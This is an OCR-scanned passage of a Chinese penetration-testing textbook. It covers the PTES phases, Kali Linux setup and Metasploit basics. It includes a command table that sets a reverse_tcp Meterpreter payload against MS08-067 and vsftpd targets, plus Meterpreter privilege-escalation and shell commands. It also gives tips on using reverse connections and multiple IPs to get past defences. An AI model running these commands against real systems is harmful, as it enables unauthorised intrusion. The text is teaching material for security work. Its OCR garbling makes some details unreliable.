的 授权 许可 ， 以 及 定期 召开 会 议 以 跟 进 渗透 测试 进程 中 出 现 的 各 种 情况 。 有 关 规 则 的 常见 问 
题 列 举 如 下 。 
m 希望 在 什么 时 候 执行 这 些 测试 ? 

- 在 工作 时 间 

- 下 班 之 后 

- 在 周末 

- 在 系统 维护 期 间 


m 这 个 测试 是 在 生产 环境 下 进行 的 吗 ? 

m 如 果 生 产 环境 不 能 受到 影响 ， 是 否 存 在 类 似 的 环境 ( 开发 或 者 测试 系统 ) 可 以 用 来 进行 渗透 
测试 ? 

m 谁 是 技术 要 点 的 联系 人 ? 









































«b 如 果 想 获得 关于 前 期 交互 的 更 多 信息 ， 请 访问 网 址 http//www.pentest-standard.org/ 


index.php/Reporting。 


1.1.2 ”信息 收集 /侦查 阶段 


互联 网 的 一 个 网 站 , 或 者 是 一 个 社会 性 的 组 织 ， 其 至 可 能 是 一 个 财力 雄厚 的 老牌 商业 公司 。 在 这 个 阶 
段 ， 最 重要 的 是 要 通过 各 种 社交 媒体 网 络 来 收集 相关 信息 ， 以 及 使 用 Google Hacking 技术 (一 种 使 用 


人 月 


在 信息 收集 阶段 ,你 需要 尽 可 能 采用 各 种 方式 来 收集 目标 网 络 的 所 有 信息 。 这 个 目标 网 络 可 能 是 

































































特殊 的 查询 方法 通过 Google 搜索 引擎 收集 敏感 信息 的 工具 ) 去 寻找 目标 的 相关 信息 。 另 外 ， 对 目标 





























使 用 主动 扫描 和 被 动 扫描 技术 进行 踩点 (footprinting ) 也 是 一 种 可 行 的 办 法 。 
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信息 收集 是 整个 渗透 测试 过 程 中 最 为 重要 的 阶段 之 一 。 与 尝试 所 有 可 行 的 渗透 测试 方法 相 比 ， 对 
目标 有 适当 的 了 解 可 以 让 测试 者 选择 合适 和 准确 的 渗透 测试 攻击 方式 。 这样 做 将 会 大 大 缩短 整个 渗透 
测试 耗费 的 时 间 。 通 常 这 个 阶段 会 占 到 整个 渗透 测试 所 需 时 间 的 40%~60%。 最 终 能 否 成 功 渗透 进入 
目标 网 络 很 大 程度 上 取决 于 测试 者 在 这 个 阶段 的 工作 成 果 。 


渗透 测试 工程 师 必须 通过 对 目标 网 络 进行 各 种 扫描 以 获得 足够 的 信息 。 扫描 目标 计算 机 上 运行 的 
服务 、 开 放 的 端口 ， 以 及 验证 这 些 端口 上 运行 着 的 全 部 服务 ,然后 判断 这 些 服务 中 哪些 是 可 以 被 攻击 
的 ， 并且 决 定 如 何 利 用 它们 作为 人 侵 目 标的 通道 。 

在 这 个 阶段 还 要 明确 目标 网 络 当 前 部 署 的 安全 控制 措施 以 及 如 何 才 能 破坏 这 些 措施 。 

接 下 来 用 一 个 示例 来 讨论 这 一 点 。 设想 这 里 有 一 个 针对 Web 服务 器 的 黑 盒 测试 , 客户 希望 进行 网 
络 流量 压力 测试 。 

我 们 将 对 服务 器 进行 网 络 流量 压力 测试 以 判断 目标 的 抗 流量 压力 水 平 。 简 言 之 ,就 是 服务 器 对 拒 
绝 服 务 ( Denial of Service, DoS ) 攻击 的 应 对 能 力 。DoS 攻击 或 网 络 流量 压力 测试 指 的 是 向 目标 服务 
髓 发 送 数量 极为 巨大 的 网 络 请 求 或 数据 ， 其 目的 是 检测 目标 服务 器 在 面 对 此 类 情形 时 ， 是 能 够 继续 正 
常 工 作 还 是 因 资 源 耗 尽 而 拒绝 服务 。 为 了 实现 这 个 目标 ,我 们 启动 网 络 压力 测试 工具 ， 并 对 目标 网 站 
发 起 一 次 攻击 。 然 而 , 在 攻击 发 起 之 后 的 几 秒 ， 服 务 器 端 就 不 再 响应 我 们 的 客户 端 请 求 ， 从 Web 客户 
端 也 无 法 打开 目标 服务 器 的 Web 页 面 。 此 外 ， 浏 览 器 上 还 会 显示 目标 Web 页 面 已 经 不 在 线 的 提示 。 
这 是 怎么 回 事 呢 ? 是 我 们 已 经 成 功 搞 掉 了 目标 服务 器 吗 ? 可 惜 的 是 ,并非 如 此 。 事 实 上 ， 这 表明 目标 
服务 器 存在 保护 机 制 。 由 于 目标 服务 器 的 管理 人 员 事 先 设置 的 保护 机 制 发 现 了 恶意 攻击 的 企图 ， 从 而 
禁止 了 从 我 们 的 卫 地 址 发 起 的 后 续 访 问 请 求 。 在 发 起 攻击 前 必须 准确 地 收集 目标 信息 以 及 验证 目标 提 
供 的 各 种 网 络 服务 。 

因此 ， 利 用 多 个 不 同 的 IP 地 址 对 目标 Web 服务 器 进行 测试 是 更 好 的 选择 。 在 测试 时 使 用 两 到 三 
个 不 同 的 虚拟 专用 服务 器 是 一 种 值得 推荐 的 做 法 。 另 外 , 我 建议 在 使 用 攻击 模块 对 真实 目标 进行 渗透 
测试 前 , 在 虚拟 环境 下 对 所 有 的 攻击 模块 进行 模拟 测试 。 一 个 正确 的 、 关 于 攻击 的 模拟 验证 是 必需 的 。 
如 果 没 有 进行 模拟 测试 就 开展 了 渗透 测试 ,那么 很 有 可 能 攻击 模块 会 直接 导致 目标 服务 前 溃 ， 而 这 并 
不 是 我 们 所 期 望 见 到 的 。 网 络 压力 测试 通常 应 该 在 业务 末期 或 者 维护 期 进行 。 此 外 ,将 用 于 测试 客户 
端的 卫 列 在 白 名 单 中 也 是 十 分 重要 的 。 

现在 来 看 第 二 个 示例 一 次 对 Windows 2012 服务 器 的 黑 盒 测 试 。 在 对 目标 服务 器 进行 扫 摘 的 
过 程 中 ， 我 们 发 现 其 80 端口 和 8080 端口 都 是 开放 的 。 在 80 端口 上 运行 着 最 新 版 的 互联 网 信息 服务 
( Internet Information Services, IIS ), 在 8080 端口 上 运行 着 存在 漏洞 的 Rejetto HFS 服务 器 , 而 Rejetto 
HFS 服务 器 容易 受到 远程 代码 执行 (Remote Code Execution, RCE ) 漏洞 的 攻击 。 

然而 ， 当 我 们 试图 利用 这 个 有 漏洞 的 HFS 进行 渗透 的 时 候 ， 却 发 现 渗透 失败 了 。 这 是 一 种 很 常见 
的 情景 ， 因 为 来 自 外 部 的 恶意 流量 可 能 被 防火 墙 拦截 了 。 

若 遇 到 这 种 情况 ， 可 以 简单 地 改变 和 人 侵 的 方式 ， 让 目标 服务 器 主动 建立 到 我 们 的 连接 ， 而 不 是 由 我 
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们 去 连接 目标 服务 器 。 这 种 方法 更 容易 成 功 , 因为 防火 墙 通常 会 被 配置 为 检测 入 站 流量 而 不 是 出 站 流量 。 
作为 一 个 过 程 ， 它 可 以 分 解 成 以 下 步骤 。 


O 目标 选择 : 选择 攻击 的 目标 ， 确 定 攻 击 达到 的 效果 以 及 整个 攻击 过 程 花费 的 时 间 。 
O 隐私 收集 : 包括 现场 信息 采集 ， 检 查 使 用 的 设备 信息 ， 甚 至 从 丢弃 的 废品 中 收集 信息 。 这 个 
阶段 是 白 盒 测试 的 一 部 分 。 

口 踩点 工作 : 包含 针对 目标 上 部 署 
获取 等 。 

口 验证 目标 的 安全 机 制 : 包含 防火 墙 、 网 络 流量 过 滤 系 统 、 网 络 和 主机 的 保护 措施 的 确认 工作 等 。 
如 果 想 获得 关于 信息 收集 的 更 多 信息 ， 请 访问 网 址 http:/www.pentest-standard.org/ 
q index.php/Intelligence Gathering, 


1.1.3 威胁 建 模 阶段 




























































































的 技术 和 软件 的 主动 和 被 动 扫描 ,例如 网 络 端口 扫描 、banner 
























































为 了 保证 渗透 测试 能 够 正确 进行 ， 必 须 进 行 威胁 建 模 。 在 这 个 阶段 ， 主 要 的 工作 是 模拟 出 对 目标 准 
确 的 威胁 以 及 这 些 威胁 的 作用 ， 并 根据 这 些 威胁 可 能 对 目标 产生 的 影响 对 其 进行 分 类 。 根 据 之 前 在 信息 
收集 阶段 做 出 的 分 析 ， 在 这 个 阶段 我 们 可 以 确定 最 佳 的 攻击 方式 。 威 胁 建 模 方 法 适用 于 商业 资产 分 析 、 
过 程 分 析 、 威 胁 分 析 以 及 威胁 能 力 分 析 。 这 一 阶段 将 解决 以 下 问题 。 
口 如 何 攻击 指定 的 网 络 ? 
口 需要 获得 的 重要 信息 是 什么 ? 
口 在 攻击 时 采取 什么 方法 最 为 合适 ? 
口 对 目标 来 说 最 大 的 安全 威胁 是 什么 ? 
威胁 建 模 将 有 助 于 渗透 测试 工程 师 完成 以 下 工作 。 
口 收集 有 关 高 等 级 威胁 的 相关 文档 。 
口 根据 基本 的 分 类 方法 对 组 织 的 资源 进行 标识 。 
口 对 威胁 进行 识别 和 分 类 。 
口 将 组 织 的 资源 映射 成 模型 。 

























































































威胁 建 模 将 有 助 于 明确 哪些 资源 最 容易 受到 威胁 ， 以 及 这 些 威 





胁 各 自 是 什么 。 














ll 


假定 现在 有 一 个 针对 公司 网 站 的 黑 盒 测试 。 目 标 公 司 的 客户 信息 是 公司 的 重要 资产 。 然 而 ,在 同 

后 台 程 序 的 男 一 个 数据 库 中 保存 了 客户 的 交易 记录 。 在 这 种 情形 下 ， 攻 击 者 就 可 以 利用 SQL 注入 
漏洞 获取 客户 的 交易 记录 ， 而 交易 记录 属于 其 他 资产 。 因 此 在 这 个 阶段 ， 应 该 建立 一 个 针对 重要 资产 
和 其 他 资产 的 SQL 注入 漏洞 威胁 模型 。 





























漏洞 扫描 工具 ( 例如 Nexpose FU Metasploit Pro 版 ) 可 以 帮助 我 们 以 自动 化 的 方式 快速 清晰 地 完成 
威胁 建 模 。 在 开展 大 规模 的 测试 时 ， 这 个 优势 更 为 明显 。 
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如 果 想 获取 关于 威胁 建 模 的 更 多 信息 ， 请 访问 网 址 http://www.pentest-standard.org/ 
index.php/Threat Modeling。 


1.1.4. 漏洞 分 析 阶 段 


漏洞 分 析 是 在 一 个 系统 或 者 应 用 程序 中 发 现 漏洞 的 过 程 。 这 些 漏洞 多 种 多 样 ， 涵 盖 了 很 多 方面 ， 
从 服务 器 的 配置 到 Web 程序 服务 ， 从 应 用 程序 到 数据 库 服 务 ， 从 基于 VOIP 的 服务 器 到 基于 SCADA 
的 服务 都 可 能 存在 漏洞 。 这 个 阶段 包含 了 三 个 不 同 的 机 制 ， 那 就 是 测试 、 验 证 和 研究 。 测 试 包括 主动 
测试 和 被 动 测试 。 验 证 包括 去 除 误 报 和 通过 手动 验证 确认 漏洞 的 存在 。 研 究 指 的 是 发 现 并 触发 漏洞 以 
确认 它 的 存在 。 


有 关 威 胁 建 模 阶 段 的 各 个 过 程 的 更 多 信息 ， 请 访问 http//www.pentest-standard.org/ 
index.php/vulnerability_analysis。 









































1.1.5 “渗透 攻击 阶段 和 后 渗透 攻击 阶段 
渗透 攻击 阶段 可 以 利用 之 前 漏洞 分 析 阶 段 的 成 果 。 这 个 阶段 一 般 被 认为 是 真正 的 攻击 阶段 。 在 这 
个 阶段 ,渗透 测试 者 可 以 针对 目标 系统 的 漏洞 使 用 对 应 的 入 侵 模 块 获得 控制 权限 。 本 书 主 要 介绍 的 就 
是 这 个 阶段 。 
后 渗透 攻击 阶段 发 生 在 渗透 攻击 阶段 之 后 , 这 个 阶段 包含 了 当成 功 渗透 攻击 到 对 方 计算 机 以 后 的 
很 多 任务 ， 比 如 提升 权限 、 上 传 和 下 载 文 件 、 跳 板 攻 击 ， 等 等 。 
有 关 渗 透 攻 击 阶段 各 个 过 程 的 详细 信息 ， 请 访问 http//www.pentest-standard.org/ 
index.php/Exploitation 。 
































有 关 后 渗透 阶段 的 更 多 信息 ， 请 访问 http:/www.pentest-standard.org/index.php/Post - 
Exploitation 。 
1.4.0 ”报告 阶段 


在 进行 渗透 测试 时 , 创建 整个 渗透 测试 的 正式 报告 是 在 最 后 一 个 阶段 进行 的 。 渗 透 测试 报告 的 重 
要 组 成 部 分 包括 : 确定 目标 最 为 重要 的 威胁 ， 将 渗透 得 到 的 数据 生成 图 表 ， 对 目标 系统 的 改进 建议 ， 
以 及 这 些 问题 的 修复 方案 。 在 本 书 的 后 半 部 分 ， 将 会 用 一 节 来 详细 描述 如 何 编写 渗透 测试 报告 。 
有 关 报 告 阶段 各 个 过 程 的 详细 信息 , 请 访问 http://www.pentest-standard.org/index.php/ 
reporting。 


1.2 ”工作 环境 的 准备 
一 次 渗透 测试 是 否 成 功 很 大 程度 上 取决 于 你 的 测试 实验 室 是 如 何 配置 的 。 此 外 ， 一 个 成 功 的 测试 
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还 需要 回答 以 下 问题 。 


口 测试 实验 室 的 配置 如 何 ? 
口 具备 所 有 必需 的 测试 工具 吗 ? 
口 硬件 是 否 足以 支持 这 些 工 具 的 运行 ? 


在 开始 任何 测试 之 前 ， 必 须 确保 所 有 的 工具 都 已 准备 就 绪 并 且 都 能 顺利 地 工作 。 









































在 虚拟 环境 中 安装 Kali Linux 


在 开始 使 用 Metasploit 之 前 ,需要 有 一 个 测试 用 的 实验 环境 。 建 立 这 种 环境 最 好 的 办 法 就 是 拥有 
数目 众多 的 计算 机 ， 同 时 在 这 些 计 算 机 上 安装 不 同 的 操作 系统 。 然 而 ， 如 果 只 有 一 台 计 算 机 的 话 ， 最 
好 的 办 法 就 是 建立 一 个 虚拟 的 实验 环境 。 

虚拟 化 技术 在 如 今 的 渗透 测试 中 扮演 着 十 分 重要 的 角色 。 由 于 硬件 设备 的 价格 相对 昂贵 ， 采 用 虚 
拟 化 技术 可 以 使 渗透 测试 经 济 有 效 。 在 一 台 计 算 机 上 模拟 出 多 个 操作 系统 不 仅 可 以 节省 大 量 成 本 ， 同 
时 也 减少 了 电力 的 使 用 和 空间 的 占用 。 建立 一 个 虚拟 化 的 渗透 测试 环境 可 以 避免 对 你 的 真实 主机 系统 
进行 任何 修改 ,并 使 得 我 们 的 所 有 操作 都 在 一 个 独立 的 环境 中 进行 。 虚 拟 化 的 网 络 环境 允许 渗透 测试 
在 一 个 独立 的 虚拟 网 络 中 运行 ， 从 而 无 须 使 用 或 者 修改 主机 系统 的 网 络 硬件 。 

此 外 ,使 用 虚拟 化 技术 的 快照 功能 可 以 保存 虚拟 机 在 某 一 时 刻 的 状态 。 这 种 功能 相当 有 用 ， 因 为 
在 我 们 进行 一 个 虚拟 测试 的 时 候 ， 可 以 随时 拿 系统 当前 的 状态 与 之 前 的 状态 进行 比较 ， 也 可 以 将 系统 
随时 恢复 到 之 前 的 状态 ， 这 样 如 果 文 件 在 模拟 攻击 时 发 生 了 变化 就 无 须 再 重新 安装 整个 软件 环境 了 。 

虚拟 化 主机 需要 主机 系统 拥有 足够 的 硬件 资源 ， 例 如 内 存 空间 、 处 理 能 力 、 硬 盘 空间 等 ， 才 能 
稳定 运行 。 




























































































0 有 关 快 照 的 更 多 信息 ， 请 访问 https:/www.virtualbox.org/manual/ch01.html#snapshots。 








现在 来 看 看 如 何 使 用 Kali 操作 系统 创建 一 个 虚拟 测试 环境 -Kali 是 全 世界 最 流行 的 渗透 操作 系统 ， 
该 系统 中 默认 安装 了 Metasploit。 














https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/, 


Qo 可 以 从 以 下 网 址 下 载 用 于 VMware 和 VirtualBox 虚拟 机 的 Kali Linux 预 建 镜像 : 





为 了 创建 虚拟 环境 ， 需 要 支持 虚拟 化 的 仿真 软件 。 可 以 从 当前 最 为 流行 的 两 款 软件 VirtualBox 和 
VMware Workstation Player 中 选择 一 个 。 好 了 ， 可 以 按照 下 面 的 步骤 开始 安装 了 。 

(1) FÆ VMware Workstation Player 安装 程序 ( https:/my.vmware.com/web/vmware/freefkdesktop end | 
user computing/vmware workstation player/14 0 )。 在 下 载 的 时 候 要 注意 选择 与 你 使 用 的 主机 系统 架构 相 
匹配 的 版 本 。 
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Q) 开始 运行 安装 程序 ， 直 到 系统 安装 工作 完成 。 E - | 
G) 下 载 最 新 版 本 的 Kali 虚拟 机 镜像 (https://images.offensive-security.com/virtual-images/kali-linux- 
2017.3-vm-amd64.ova )。 


(4) 运行 VM Player 程序 ， 如 下 图 所 示 。 





b VMware Workstation 12 Player 


Player v | X B H 








Welcome to VMware 





Workstation 12 Player 
Windows Server 2016 y 
Ubuntu 64-Bit 16.04 Create a New Virtual Machine 
Create a new virtual machine, which will then be added to 





OffsecVM-2017.2-20171023 
Ubuntu 64-bit (Claire) Vul W. 80 


the top of your library. 


Open a Virtual Machine 


Open an existing virtual machine, which will then be added 
to the top of your library. 


Download a Virtual Appliance 
li Download a virtual appliance from the marketplace. You can 
then open it in Player. 


Help 


View online help. 

















(5) 切换 到 Player 选项 卡 ， 然 后 选中 File | Open; 
(6) 浏览 解压 后 Kali Linux 的 *.ova XAF, Hih Open 按钮 ， 然 后 会 出 现 如 下 界面 。 


Import Virtual Machine X 


Store the new Virtual Machine 


Provide a name and local storage path for the new virtual 
machine. 








Name for the new virtual machine: 





Kali-Linux-2017.3-vm-amd64| 








Storage path for the new virtual machine: 








E:\VMS\New Kali Browse... 

















. Hep | Import || Cancel 
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(7) 为 虚拟 机 随便 起 一 个 名 字 ， 然 后 指定 一 个 保存 目录 (我 倾向 于 在 一 个 拥有 较 大 空间 的 硬盘 上 
创建 一 个 文件 夹 )， 再 单 击 Import 按钮 。 

(8) 接 下 来 的 导入 过 程 会 花费 一 些 时 间 ， 你 要 保持 耐心 ， 不 妨 在 这 个 时 候 听 点 喜欢 的 音乐 。 

(9) 成 功 导入 之 后 ， 就 可 以 在 左 侧 的 虚拟 机 列表 中 看 到 这 个 新 加 入 的 虚拟 机 ， 如 下 图 所 示 。 














b: VMware Workstation 12 Player 





Player ~ | P» ~ b 


Home 


giu Kali-Linux-2017.3-vm-amd6« 


hab ree 
[* 1 Windows Server 2016 
ta Ubuntu 64-Bit 16.04 


[ 3 OffsecVM-2017.2-20171023 






























「 3 Ubuntu 64-bit (Claire) Vul W 80 





Kali-Linux-2017.3-vm-amd64 


State: Powered Off 
OS: Other 
Version: Workstation 8.x virtual machine 
RAM: 2 GB 


f» Play virtual machine 


cal Edit virtual machine settings 





























(10) 接 下 来 只 需要 启动 这 个 操作 系统 即 可 。 一 个 好 消息 就 是 Kali Linux 虚拟 机 镜像 文件 中 已 经 自 
带 了 VMware Tools, 有 了 这 个 工具 , 你 就 可 以 实现 在 虚拟 机 和 宿主 机 之 间 拖 中 文件、 共享 文件 等 功能 。 

(11) Kali Linux 虚拟 机 的 登录 用 户 名 为 root， 密 人 码 为 tooro 

(12) 下 面 打开 一 个 命令 行 ， 然 后 初始 化 并 启动 Metasploit 的 数据 库 ， 如 下 图 所 示 。 



































root@kali:-~# msfdb init 

Creating database user 'msf' 

Enter password for new role: 

Enter it again: 

Creating databases 'msf' and 'msf test' 

Creating configuration file in /usr/share/metasploit-framework/config/database 
.yml 

Creating initial database schema 

root@kali:-~# msfdb start 

rootgkali:-4 
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(13) 接 下 来 输入 msfconsole 命令 来 启动 Metasploit 框架 ， 如 下 图 所 示 。 





root@kali:~# msfconsole 


Xx 
$ 
\ + 
* 
X / X 
THE 
# %# 
THHE 
/ * 
* 
T * 
EHHE o A. m THEHHHHH E — A THEHHE 
EHEHE / THHHHHHHHHHE HHHH 






Kf WAVE 4 fHHHHHHHE SCORE 31337 #4 


https://metasploit.com 





=[ metasploit v4.16.17-dev ] 
+ -- ---[ 1703 exploits - 969 auxiliary - 299 post 1 
+ -- ---[ 503 payloads - 40 encoders - 10 nops ] 
+ -- ---[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 
sf»? 








A X Kali Linux 的 完整 安装 指导 ， 请 访问 http:;//docs.kali.org/category/installation 。 


如 需 通过 命令 行 在 Linux 系统 上 安装 Metasploit, 请 访问 http:;//www.darkoperator.com/installing- 


qb metasploit-in-ubunt/, 
如 需 在 Windows 操作 系统 上 安装 Metasploit, 请 访问 以 下 网 址 的 教程 :https://www.packtpub. 
com/mapt/book/networking and servers/9781788295970/2/ch021vllsec20/installing-metasploit- 
on-windows ; 


1.3 Metasploit 基础 


到 现在 为 止 我 们 已 经 回顾 了 渗透 测试 的 基础 内 容 ， 也 完成 了 Kali Linux 的 建立 。 接 下 来 介绍 一 下 


Tir 
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重点 部 分 : Metasploit。Metasploit 是 一 种 安全 框架 ， 为 渗透 测试 工程 师 提 供 了 大 量 的 渗透 模块 和 扫描 
模块 。2003 年 H.D Moore 创建 了 Metasploit， 从 那 之 后 Metasploit 便 快速 发 展 起 来 ， 如 今 被 公认 是 最 
为 流行 的 渗透 测试 工具 之 一 。Metasploit 是 一 个 完全 的 Ruby 驱动 项 目 , 提供 了 大 量 的 漏洞 渗透 、 攻 击 

















载荷 ( payload )、 编 码 技术 以 及 后 渗透 模块 。 








Metasploit 提供 了 以 下 多 种 版 本 。 


口 Metasploit Pro 版 : 这 是 Metasploit 的 一 个 商业 化 版 本 ， 提 供 了 大 量 的 功能 ， 例 如 Web 应 用 程 


















































序 扫描 工具 、 渗透 模块 、 自 动 化 渗透 工具 , 十 分 适合 专业 渗透 测试 工程 师 和 IT 安全 团队 使 用 。 
Pro 版 主要 用 来 实现 专业 的 、 高 级 的 、 大 型 渗透 测试 和 企业 安全 项 目 。 





























说 ， 这 是 一 个 不 错 的 选择 。 














口 Metasploit Express 版 : 这 是 一 个 为 初级 渗透 测试 工程 师 设计 的 版 本 。 这 个 版 本 的 Metasploit 
包含 了 智能 化 渗透 、 密 码 的 自动 化 暴力 破解 等 功能 , 十 分 适合 中 小 型 企业 的 TT 安全 团队 使 用 。 
口 Metasploit Community 版 : 这 是 Metasploit Express 精简 后 的 免费 版 本 。 对 于 小 企业 和 学 生来 

















口 Metasploit Framework 版 : 这 是 一 个 完全 在 命令 行 中 运行 的 版 本 。 这 个 版 本 的 所 有 任务 都 在 命令 








行 下 完成 ， 比 如 说 手动 渗透 、 第 三 方 模块 导 和 等。 该 版 本 适合 开发 人 员 和 安全 研究 人 员 o 
本 书 中 采用 的 是 Metasploit Community 版 和 Framework hi o Metasploit 还 提供 了 下 面 几 种 类 型 的 用 


























户 界 面 。 











口 GUI (graphical userinterface， 图 形 用 户 界面 ): 在 图 形 化 工作 模式 下 ， 往 往 轻 点 一 下 鼠标 就 
能 完成 所 有 的 任务 。 这 种 工作 方式 提供 了 友好 的 操作 模式 和 简单 快捷 的 漏洞 管理 方式 。 
口 控制 台 界 面 : 最 为 普遍 也 最 为 流行 的 工作 方式 。 这 种 界面 提供 了 一 种 统一 的 工作 方式 来 管理 












































Metasploit 的 所 有 功能 。 这 种 管理 方法 通常 也 被 认为 是 最 稳定 的 控制 方法 之 一 。 在 本 书 中 ， 这 











种 管理 方式 是 最 常用 的 。 









































口 命令 行 界面 : 命令 行 界面 是 功能 最 为 强大 的 界面 ， 它 支持 对 渗透 模块 的 所 有 操作 〈 例如， 攻 
击 载荷 的 生成 )。 然 而 在 使 用 命令 行 界面 时 ， 记 住 每 一 条 命令 是 十 分 困难 的 。 
口 Armitage: Armitage 是 Raphael Mudge 编写 的 一 个 充满 了 黑客 风格 的 GUI。Armitage 提供 轻松 






































的 漏洞 管理 、 内 置 的 Nmap 扫描、 渗透 攻 击 推荐 ， 并 通过 使 用 Cortana 脚本 实现 自动 化 功能 。 
本 书后 半 部 分 用 了 一 整 章 来 细致 地 讲解 Armitage 和 Cortana 脚本 语言 。 





























Æ X Metasploit Community 版 的 更 多 信息 ， 请 访问 https://community.rapid7.com/community/ 


Metasploit/blog/2011/12/21/Metasploit-tutorial-an-introduction-to-Metasploit-community 。 


1.4 ”使 用 Metasploit 进行 渗透 测试 





在 Kali Linux 建立 完成 之 后 ， 准 备 使 用 














Metasploit 开展 我 们 的 第 一 个 渗透 测试 。 不 过 在 开始 这 个 


测试 之 前 ， 先 来 回顾 一 下 Metasploit 的 基本 功能 和 术语 。 


1.4 使 用 Metasploit 进行 渗透 测试 13 





回顾 Metasploit 的 基础 知识 


成 功 运行 Metasploit 之 后 ， 就 可 以 在 Meta 


sploit 的 命令 控制 台 上 键入 help 命令 或 2，Metasploit 





会 列 出 所 有 可 以 使 用 的 命令 。 接 下 来 回顾 一 下 在 Metasploit 中 使 用 的 基本 术语 。 





口 渗透 模块 (exploit )， 这 是 一 段 程序 ， 





行 。 它 能 帮助 我 们 在 目标 系统 上 获得 需 


块 、 网 络 协议 欺骗 以 及 其 他 一 些 模块 。 
口 编码 器 模块 (encoder): Zi 
机 制 的 检测 。 目 标 安全 保护 机 制 包 括 杀 






































各 种 可 以 在 目标 上 执行 的 功能 ， 从 而 成 








运行 时 会 利用 目标 的 安全 漏洞 进行 攻击 。 
O 攻击 载荷 模块 (payload ): 在 成 功 对 目标 完成 一 次 渗透 之 后 ， 这 段 程序 开始 在 目标 计算 机 上 运 

















要 的 访问 和 行动 权限 。 


口 辅助 模块 ( auxiliary ): 包含 了 一 系列 的 辅助 支持 模块 ， 包 括 扫描 模块 、fnzz 测试 漏洞 发 据 模 





码 器 模块 通常 用 来 对 攻击 模块 进行 代码 混淆 ,来 逃 过 目标 安全 保护 





毒 软件 和 防火 墙 等 。 

















口 Meterpreter: Meterpreter 是 一 种 使 用 内 存 技术 的 攻击 载荷 ， 可 以 注入 到 进程 之 中 。 它 提供 了 


为 了 最 受 欢 迎 的 攻击 载荷 。 





现在 来 回顾 一 下 本 章 中 Metasploit 将 会 用 到 的 基本 命令 。 下 表 给 出 了 这 些 命令 的 使 用 示例 。 
























































$ 4 用 途 m 例 
use [Auxiliary/Exploit/ 选择 一 个 指定 的 模块 并 使 其 开始 msf>use 
Payload/Encoder] 工作 exploit/unix/ftp/vsftpd 234 backdoor 
msf»use 
auxiliary/scanner/portscan/tcp 
show [exploits/payloads/ 显示 可 用 的 特定 功能 的 模块 msf»show payloads 
encoder/auxiliary/options] msf> show options 
set [options/payload] 给 某 个 特定 对 象 赋值 msf>set payload 
windows/Meterpreter/reverse tcp 
msf>set LHOST 192.168.10.118 
msf> set RHOST 192.168.10.112 
msf» set LPORT 4444 
msf> set RPORT 8080 
setg [options/payload] 给 某 个 对 象 赋值 的 同时 设 定 作用 msf>setg RHOST 192.168.10.112 
域 为 全 局 ， 在 模块 进行 切换 的 时 
候 ， 该 对 象 的 值 不 会 被 改变 
run 在 设置 一 个 辅助 模块 需要 的 所 有 msf>run 
选项 之 后 ， 启 动 该 辅助 模块 
exploit 启动 一 个 渗透 模块 msf>exploit 
back 取消 当前 选择 的 模块 并 且 退 回 到 msf (ms08. 067. netapi)»back 
上 一 级 命令 窗口 msf> 
Info 列 出 相关 模块 的 信息 msf>info 
exploit/windows/smb/ms08_067_netapi 
msf (ms08_067_netapi)>info 
Search 搜索 符合 条 件 的 特定 模块 msf>search hfs 
check 检查 某 个 特定 目标 是 否 易 受 攻 击 msf>check 
Sessions 列 出 当前 可 用 的 会 话 msf>sessions [session number] 
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下 面 来 看 看 Meterpreter 的 基本 命令 。 
Meterpreter 命令 用 B 示 例 
sysinfo 列 出 被 渗透 主机 的 系统 信息 eterpreter>sysinfo 
ifconfig 列 出 被 渗透 主机 的 网 络 接 eterpreter>ifconfig 
eterpreter>ipconfig (Windows) 
arp 列 出 目标 主机 ARP 缓存 地 址 的 全 地 址 和 MAC 地 址 eterpreter>arp 
background 将 一 个 处 于 激活 状态 的 会 话 发 送 到 后 台 eterpreter»background 
shell 获取 目标 主机 的 一 个 cmdshell eterpreter»shell 
getuid 获取 当前 用 户 细节 eterpreter>getuid 
getsystem 提升 权限 ， 获 取 系统 级 权限 eterpreter>getsystem 
getpid 获取 Meterpreter 会 话 在 目标 主机 上 注入 进程 的 进程 号 eterpreter>getpid 
ps 列 出 目标 主机 上 运行 的 所 有 进程 eterpreter>ps 
我 们 已 经 回顾 了 Metasploit 命令 的 基础 知识 。 在 下 一 节 中 ,我们 看 看 与 传统 工具 和 脚本 相 比 ， 使 





























用 Metasploit 的 优势 都 有 哪些 。 





如 果 是 第 一 次 接触 Metasploit， 可 访问 http://www.offensive-security.com/metasploit- 
unleashed/Msfconsole Commands 获取 关于 基本 命令 的 更 多 信息 。 


1.5 使 用 Metasploit 进行 渗透 测试 的 优势 


在 开始 渗透 之 旅 之 前 ， 必 须 弄 清楚 为 什么 要 使 用 Metasploit 工具 来 替代 手动 渗透 技术 。 是 因为 那 
看 起 来 很 酷 的 黑客 风格 的 控制 终端 使 我 们 显得 很 专业 , 还 是 有 什么 其 他 的 原因 ? 与 传统 的 手动 技术 相 
比 ， 选 择 Metasploit 的 原因 主要 有 以 下 几 点 。 























1.5.1 源 代码 的 开放 性 


选择 Metasploit 的 主要 理由 之 一 就 是 其 源 代码 的 开放 性 以 及 积极 快速 的 发 展 。 世 界 上 还 有 许多 非 
常 优秀 的 商业 版 渗透 测试 工具 ， 但 是 Metasploit 对 用 户 开 放 它 的 源 代码 ， 并 且 人 允许 用 户 添加 自己 的 自 
定义 模块 。 虽然 Metasploit Pro 版 本 是 收费 的 ,但 如 果 以 学 习 为 目的 ， 可 以 将 Metasploit Community 版 
作为 首选 。 


1.5.2 ”对 大 型 网 络 测试 的 支持 以 及 便利 的 命名 规则 


Metasploit 框架 十 分 易 用 , 不 过 这 里 的 易 用 性 是 指 Metasploit 中 命令 的 简单 命名 约定 。 它 为 执行 大 
规模 的 网 络 渗透 测试 提供 了 便利 。 设 想 这 样 一 个 场景 : 我 们 面 对 的 网 络 包含 了 整整 200 个 系统 。 当 使 
用 Metasploit 时 ， 你 可 以 对 整个 目标 网 络 进行 自动 化 渗透 测试 ， 而 不 必 一 台 一 台地 逐个 测试 。 指 定 参 
数值 后 ， 例 如 子 网 (subnet) 和 无 类 别 域 际 路 由 ( Classless Inter Domain Routing, CIDR ), Metasploit 
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就 可 以 自动 对 所 有 计算 机 进行 测试 以 发 现 目标 上 的 漏洞 。 而 如 果 采 用 手动 测试 ， 就 需要 分 别 对 200 个 
系统 逐个 测试 。 因 此 使 用 Metasploit 渗透 框架 可 以 节省 大 量 的 时 间 和 精力 。 


1 











.5.3 ”灵活 的 攻击 载荷 模块 生成 和 切换 机 制 























最 为 重要 的 是 ， 在 Metasploit 中 切换 攻击 载荷 模块 十 分 容易 一 它 提供 了 set payload 命令 来 快 














